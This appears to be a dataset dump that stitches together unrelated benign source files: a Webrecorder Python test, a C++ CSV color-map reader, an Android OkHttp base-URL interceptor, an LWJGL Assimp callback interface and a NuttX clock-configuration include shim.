        assert self.redis.keys(Stats.BROWSERS_KEY.format('*')) == [Stats.BROWSERS_KEY.format('chrome:60')]

        assert self.redis.hget(Stats.BROWSERS_KEY.format('chrome:60'), today_str()) == '4'

    def test_record_put_record(self):
        # A remote browser PUTs a captured resource into the recording.
        with patch('webrecorder.browsermanager.BrowserManager._api_reqid_to_user_params', mock_reqid_to_user_params):
            res = self.testapp.put('/api/v1/remote/put-record?reqid=ABCDEF&target_uri=custom:///test.txt', params=b'Test Resource\nData',
                                   headers={'Content-Type': 'text/other'})

        assert res.json['WARC-Date']

        # session should not change
        assert 'Set-Cookie' not in res.headers

    def test_replay_resource(self):
        # The resource recorded above replays with its original content type.
        assert self.testapp.cookies['__test_sesh'] != ''

        res = self._anon_get('/{user}/temp/mp_/custom:///test.txt')

        assert res.headers['Content-Type'] == 'text/other'
        assert 'Test Resource\nData' == res.text
1,163 | // Copyright 2017-present, Facebook, Inc.
// All rights reserved.
//
// This source code is licensed under the license found in the
// LICENSE file in the root directory of this source tree.
//File: color_mapping.hh
#pragma once
#include <csv.h>
#include <algorithm>
#include <unordered_map>
#include <string>
#include <glm/glm.hpp>
#include "lib/debugutils.hh"
namespace render {
// A case-insensitive map, from a string to rgb
// A case-insensitive map from a class name to an RGB color in [0,1]^3.
class ColorMappingReader final {
 public:
  // fname: a comma-separated csv with column:
  // name,r,g,b. r,g,b are integers in range [0,255]
  explicit ColorMappingReader(std::string fname) {
    reader_.reset(new io::CSVReader<4>{fname});
    reader_->read_header(io::ignore_extra_column, "name", "r", "g", "b");
    std::string name;
    unsigned int r, g, b;
    while (reader_->read_row(name, r, g, b)) {
      // Keys are stored lower-cased so lookups are case-insensitive.
      std::transform(name.begin(), name.end(), name.begin(), ::tolower);
      colormap_.emplace(name, glm::vec3{r/255.0, g/255.0, b/255.0});
    }
  }

  // Case-insensitive lookup; logs and returns black for unknown classes.
  glm::vec3 get_color(std::string klass) {
    std::transform(klass.begin(), klass.end(), klass.begin(), ::tolower);
    auto itr = colormap_.find(klass);
    if (itr == colormap_.end()) {
      print_debug("Couldn't find color for class %s\n", klass.c_str());
      return {0,0,0};
    }
    return itr->second;
  }

  // Color of the "other" entry from the csv, or black if absent.
  // Fix: previously used operator[], which silently inserted a
  // default-constructed entry when "other" was missing (mutating the map
  // and inflating size()); use a non-mutating lookup instead.
  glm::vec3 get_background_color() {
    auto itr = colormap_.find("other");
    return itr == colormap_.end() ? glm::vec3{0, 0, 0} : itr->second;
  }

  // Number of distinct class names loaded from the csv.
  int size() const { return colormap_.size(); }

 private:
  std::unordered_map<std::string, glm::vec3> colormap_;
  std::unique_ptr<io::CSVReader<4>> reader_;
};
}
| 668 |
331 | <gh_stars>100-1000
package com.lauzy.freedom.data.net.interceptor;
import android.support.annotation.NonNull;
import com.lauzy.freedom.data.net.constants.NetConstants;
import java.io.IOException;
import okhttp3.HttpUrl;
import okhttp3.Interceptor;
import okhttp3.Request;
import okhttp3.Response;
/**
* Desc : 切换BaseUrl拦截器
* Author : Lauzy
* Date : 2017/9/28
* Blog : http://www.jianshu.com/u/e76853f863a9
* Email : <EMAIL>
*/
/**
 * OkHttp interceptor that swaps the request's base URL (scheme/host/port)
 * according to the {@code BASE_URL_HEAD} routing header attached by the API
 * layer.  Requests without the header pass through untouched.
 */
public class BaseUrlInterceptor implements Interceptor {

    @Override
    public Response intercept(@NonNull Chain chain) throws IOException {
        Request originalRequest = chain.request();
        String urlHead = originalRequest.headers().get(NetConstants.Header.BASE_URL_HEAD);
        HttpUrl oldHttpUrl = originalRequest.url();

        if (urlHead == null || urlHead.isEmpty()) {
            // No routing header: leave the request untouched.
            return chain.proceed(originalRequest);
        }

        HttpUrl newBaseUrl;
        Request.Builder builder;
        if (NetConstants.Header.BAIDU_HEAD_CONTENT.equals(urlHead)) {
            newBaseUrl = HttpUrl.parse(NetConstants.BASE_URL);
            // The Baidu endpoint additionally requires a fixed User-Agent.
            builder = originalRequest
                    .newBuilder()
                    .addHeader(NetConstants.Header.USER_AGENT, NetConstants.Header.USER_AGENT_CONTENT);
        } else if (NetConstants.Header.BANDSINTOWN_HEAD_CONTENT.equals(urlHead)) {
            newBaseUrl = HttpUrl.parse(NetConstants.BASE_ARTIST_URL);
            builder = originalRequest.newBuilder();
        } else if (NetConstants.Header.GECIMI_HEAD_CONTENT.equals(urlHead)) {
            newBaseUrl = HttpUrl.parse(NetConstants.BASE_LRC_URL);
            builder = originalRequest.newBuilder();
        } else {
            // Unknown routing value: keep the request's own base URL.
            newBaseUrl = oldHttpUrl;
            builder = originalRequest.newBuilder();
        }

        if (newBaseUrl == null) {
            // Fix: Interceptor.intercept must return a non-null Response.
            // Previously this returned null (NPE downstream in the OkHttp
            // chain) when HttpUrl.parse failed; fall back to the original
            // request instead.
            return chain.proceed(originalRequest);
        }

        HttpUrl newFullUrl = oldHttpUrl
                .newBuilder()
                .scheme(newBaseUrl.scheme())
                .host(newBaseUrl.host())
                .port(newBaseUrl.port())
                .build();
        return chain.proceed(builder.url(newFullUrl).build());
    }
}
| 1,129 |
4,054 | <filename>modules/lwjgl/assimp/src/generated/java/org/lwjgl/assimp/AIFileReadProcI.java
/*
* Copyright LWJGL. All rights reserved.
* License terms: https://www.lwjgl.org/license
* MACHINE GENERATED FILE, DO NOT EDIT
*/
package org.lwjgl.assimp;
import org.lwjgl.system.*;
import org.lwjgl.system.libffi.*;
import static org.lwjgl.system.APIUtil.*;
import static org.lwjgl.system.MemoryUtil.*;
import static org.lwjgl.system.libffi.LibFFI.*;
/**
* <h3>Type</h3>
*
* <pre><code>
* size_t (*{@link #invoke}) (
* struct aiFile *pFile,
* char *pBuffer,
* size_t size,
* size_t count
* )</code></pre>
*/
@FunctionalInterface
@NativeType("aiFileReadProc")
public interface AIFileReadProcI extends CallbackI {
FFICIF CIF = apiCreateCIF(
FFI_DEFAULT_ABI,
ffi_type_pointer,
ffi_type_pointer, ffi_type_pointer, ffi_type_pointer, ffi_type_pointer
);
@Override
default FFICIF getCallInterface() { return CIF; }
@Override
default void callback(long ret, long args) {
long __result = invoke(
memGetAddress(memGetAddress(args)),
memGetAddress(memGetAddress(args + POINTER_SIZE)),
memGetAddress(memGetAddress(args + 2 * POINTER_SIZE)),
memGetAddress(memGetAddress(args + 3 * POINTER_SIZE))
);
apiClosureRetP(ret, __result);
}
/**
* File read procedure
*
* @param pFile file pointer to read from
* @param pBuffer the buffer to read the values
* @param size size in bytes of each element to be read
* @param count number of elements to be read
*
* @return the number of elements read
*/
@NativeType("size_t") long invoke(@NativeType("struct aiFile *") long pFile, @NativeType("char *") long pBuffer, @NativeType("size_t") long size, @NativeType("size_t") long count);
} | 770 |
1,006 | <reponame>eenurkka/incubator-nuttx
/****************************************************************************
* arch/arm/src/lpc17xx_40xx/lpc17_40_clockconfig.c
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership. The
* ASF licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
****************************************************************************/
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
/* This file is only a thin shell that includes the correct clock
* configuration logic for the selected LPC17xx/LPC40xx family. The correct
* file cannot be selected by the make system because it needs the
* intelligence that only exists in chip.h that can associate an
* LPC17xx/LPC40xx part number with an LPC17xx/LPC40xx family.
*
* The LPC176x and LPC178x_40xx system control block is *nearly* identical
* but we have found that the LPC178x_40xx is more sensitive to the ordering
* of certain operations. So, although the hardware seems very similar, the
* safer thing to do is to separate the LPC176x and LPC178x_40xx into
* separate files.
*/
#include <arch/lpc17xx_40xx/chip.h>
#if defined(LPC176x)
# include "lpc176x_clockconfig.c"
#elif defined(LPC178x_40xx)
# include "lpc178x_40xx_clockconfig.c"
#else
# error "Unrecognized LPC17xx/LPC40xx family"
#endif
/****************************************************************************
* Pre-processor Definitions
****************************************************************************/
/****************************************************************************
* Public Data
****************************************************************************/
/****************************************************************************
* Private Data
****************************************************************************/
/****************************************************************************
* Private Functions
****************************************************************************/
/****************************************************************************
* Public Functions
****************************************************************************/
| 635 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.